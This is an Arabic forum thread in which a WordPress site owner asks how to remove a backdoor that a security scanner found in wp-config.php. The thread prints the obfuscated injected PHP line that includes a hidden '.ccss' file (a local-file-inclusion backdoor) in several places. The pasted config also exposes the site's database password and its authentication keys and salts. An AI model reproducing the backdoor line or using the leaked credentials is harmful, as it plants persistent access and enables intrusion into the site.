اهلا بكم مره اخرى اثناء بحثي في مشكلات الموقع عندي وجدت هذا الملف المحقون

طبعا عملت ازاله من خلال الوردفانس وحملت نسخه قديمه للموقع ولكن ايضا رجع هذا الملف .

كيف يمكنني ازالته . اليكم بيانات هذا الملف 🇦

  • Filename: /home/isisawtd/edmonjad.com/wp-config.php

  • File Type: WordPress Configuration File

*

  • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: \x0a/*92e98*/\x0a\x0a$r2qpwa = "/home/isisawtd/edmonjad.\x63om/wp\x2d\x63ontent/wptou\x63h\x2ddata\x2dold/debug/.ae0d5687.\x63\x63ss"; strpos($r2qpwa, 'l2q'); @include_once /* a */ ($r2qpwa);\x0a\x0a/*92e98*/


    The issue type is: Backdoor😛HP/lfi.11719
    Description: Injected local file inclusion


    This is your main configuration file and cannot be deleted. It must be cleaned manually.

شكرا لكم مقدماً

    مرحبا اخي الكريم اذهب الى الملف في الاستضافة واحذفه من هناك بارك الله فيك

    gad

    إما قم بحذف الملف من خلال لوحة تحكم الاستضافة أو قم بتغيير محتواه إلى ما هو مناسب. هل يوجد ملف آخر باسم wp-config.php في استضافتك؟

    لأن إزالة الملف الصحيح قد يتسبب بتعطل موقعك.

      [سجل الدخول لترى الرابط]

      اخ علي كيف اقدر اشيل هذا الملف من الكونفيج وارجع الاعدادات للطبيعيه

      • Filename: /home/isisawtd/edmonjad.com/wp-config.php

      • File Type: WordPress Configuration File

      *

      • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: \x0a/*92e98*/\x0a\x0a$r2qpwa = "/home/isisawtd/edmonjad.\x63om/wp\x2d\x63ontent/wptou\x63h\x2ddata\x2dold/debug/.ae0d5687.\x63\x63ss"; strpos($r2qpwa, 'l2q'); @include_once /* a */ ($r2qpwa);\x0a\x0a/*92e98*/


        The issue type is: Backdoor😛HP/lfi.11719
        Description: Injected local file inclusion

        gad

        هل لديك صلاحية الدخول إلى لوحة تحكم الاستضافة؟ وما نوع لوحة التحكم لديك؟

          علي ملص

          نعم لدي صلاحيه الدخول على الاستضافه نوعها سي بانل هل هذا ما تقصده

          gad

          تمام أخي هذا ما أقصده. قم بتنزيل ملف wp-config.php على حاسوبك لتكون النسخة المنزلة بمثابة نسخة احتياطية، ثم أزل الملف من خلال cPanel. أقصد الملف الذي يتضمن النص الذي قدمته في الموضوع أعلاه.

            gad استاذ جاد هل يمكنك فتح هذا الملف وكتابة محتوياته لنا هنا، فالملف wp-config معروف محتوياته ومحفوظ ونريد ان نعرف ما الذي تم اضافته له لعملية التهكير.

              علي ملص اشكرك يا علي على اهتمامك اعتقد الملف الذي سوف انزله هو مصاب بالفعل

              واعتقد ان ذلك ايضا في الثلاث مواقع

              هشام حسين استاذي هشام حسين حاضر من عنيا هانزلكم المحتويات هنا ربي يسعدك

              ارى هنا الاوزون مختلف في القالب هل معنى ذلك انه تم تغيير شئ ومنها تعتبر ثغره

              هشام حسين

              لا استطيع رفع الملفات

              دائما ما يعطني هناك حطأ يبدو ان الموقع هنا محدود بصلاحيات ولا يمكنني ايضا كتابه محتويات ملف الكونفيج

              <?php

              /*92e98*/

              $r2qpwa = "/home/isisawtd/edmonjad.\x63om/wp\x2d\x63ontent/wptou\x63h\x2ddata\x2dold/debug/.ae0d5687.\x63\x63ss"; strpos($r2qpwa, 'l2q'); @include_once /* a */ ($r2qpwa);

              /*92e98*/

              define( 'WP_CACHE', true );

              //Begin Really Simple SSL session cookie settings

              @ini_set('session.cookie_httponly', true);

              @ini_set('session.cookie_secure', true);

              @ini_set('session.use_only_cookies', true);

              //END Really Simple SSL

              // Added by WP Rocket

              /**

              * The base configuration for WordPress

              *

              * The wp-config.php creation script uses this file during the

              * installation. You don't have to use the web site, you can

              * copy this file to "wp-config.php" and fill in the values.

              *

              * This file contains the following configurations:

              *

              * * MySQL settings

              * * Secret keys

              * * Database table prefix

              * * ABSPATH

              *

              * @link [سجل الدخول لترى الرابط]

              *

              * @package WordPress

              */

              // ** MySQL settings - You can get this info from your web host ** //

              /** The name of the database for WordPress */

              define('DB_NAME', 'isisawtd_edmon');

              /** MySQL database username */

              define('DB_USER', 'isisawtd_edmon');

              /** MySQL database password */

              define('DB_PASSWORD', 'thecisspishere');

              /** MySQL hostname */

              define('DB_HOST', 'localhost');

              /** Database Charset to use in creating database tables. */

              define('DB_CHARSET', 'utf8mb4');

              /** The Database Collate type. Don't change this if in doubt. */

              define('DB_COLLATE', '');

              /**#@+

              * Authentication Unique Keys and Salts.

              *

              * Change these to different unique phrases!

              * You can generate these using the {@link [سجل الدخول لترى الرابط] WordPress.org secret-key service}

              * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.

              *

              * @since 2.6.0

              */

              define('AUTH_KEY', 'FzH_N;VL%sf6aqUeE`J e}knM7;&!;V=VC :$22xVzrt5qZY?uyw#(9Y3mS29ds');

              define('SECURE_AUTH_KEY', '}G.{UNI#$,,D-8c6Iz!7)IZ7U8W8I0GEUB7:,TsW:_%kpfoW,O;q_cF1[MpK@za!');

              define('LOGGED_IN_KEY', 'VTx+~19`9Ph-R{)P_%:F@g P!D]C<Q75 it)gO7Cmt|pYi!uTcl7r7tE.YFRm/');

              define('NONCE_KEY', '[سجل الدخول لترى الرابط]{US q47hLWvx706CP+vPMgBZ/!Fi<`tJ5j@MHbQcGUCs8}UmD=');

              define('AUTH_SALT', 'yaV9GuzzAhZ&fyOGU~MDa[2sT.!UvmB%bKBfVVr@DwZ&=LT?dq *Q=6[<-<k[Nkz');

              define('SECURE_AUTH_SALT', 'iy, 5eHj<!|rqL%w:1{gcn6:$QEsL7p,[D,UUCqbc2|Tps1b<2&VAu%FJwk4,O');

              define('LOGGED_IN_SALT', 'ixrhg🙂_.c:6vaQK[ 5?8?}RxI}7LRiPB+pHA2mp_T.7e)>L7[aeHc0v;{G5+OEC');

              define('NONCE_SALT', 'JU LOsx.wS>`;IkXgBJ_kk+)f6y9,7`0OH`N2+Pwru_inR@/go@;v-XM!RC6$`mP');

              /**#@-*/

              /**

              * WordPress Database Table prefix.

              *

              * You can have multiple installations in one database if you give each

              * a unique prefix. Only numbers, letters, and underscores please!

              */

              $table_prefix = 'wp_';

              /**

              * For developers: WordPress debugging mode.

              *

              * Change this to true to enable the display of notices during development.

              * It is strongly recommended that plugin and theme developers use WP_DEBUG

              * in their development environments.

              *

              * For information on other constants that can be used for debugging,

              * visit the Codex.

              *

              * @link [سجل الدخول لترى الرابط]

              */

              define('WP_DEBUG', false);

              /* That's all, stop editing! Happy blogging. */

              /** Absolute path to the WordPress directory. */

              if ( !defined('ABSPATH') )

              تسجيل الدخول لعرض الكود

              /** Sets up WordPress vars and included files. */

              require_once(ABSPATH . 'wp-settings.php');

              هشام حسين

              اخيرا كتبته يا عزيزي بالرد السابق

              ارجو تنويري واعطائي الحل

                gad قم بمسحه الآن لانه يوجد به معلومات حساسه استاذ جاد